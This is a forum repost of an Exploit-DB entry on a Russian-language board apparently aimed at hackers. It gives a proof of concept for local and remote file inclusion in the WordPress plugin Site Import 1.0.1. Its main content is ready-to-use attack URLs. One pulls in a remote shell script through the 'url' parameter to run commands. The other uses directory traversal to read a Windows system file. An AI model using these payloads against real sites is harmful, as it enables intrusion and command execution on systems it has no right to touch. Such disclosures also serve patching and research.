Exploit WordPress Plugin Site Import 1.0.1 - Local/Remote File Inclusion

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
39558
Проверка EDB
  1. Пройдено
Автор
WADEEK
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
N/A
Дата публикации
2016-03-14
WordPress Plugin Site Import 1.0.1 - Local/Remote File Inclusion
Код:
# Exploit Title: Wordpress Site Import 1.0.1 | Local and Remote file inclusion
# Exploit Author: Wadeek
# Website Author: https://github.com/Wad-Deek
# Software Link: https://downloads.wordpress.org/plugin/site-import.1.0.1.zip
# Version: 1.0.1
# Tested on: Xampp on Windows7
 
[Version Disclosure]
======================================
/wp-content/plugins/site-import/readme.txt
======================================
[PoC]
======================================
Remote File Inclusion == http://localhost/wordpress/wp-content/plugins/site-import/admin/page.php?url=http%3a%2f%2flocalhost%2fshell.php?shell=ls
Local File Inclusion == http://localhost/wordpress/wp-content/plugins/site-import/admin/page.php?url=..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini
======================================
 
Источник
www.exploit-db.com

Похожие темы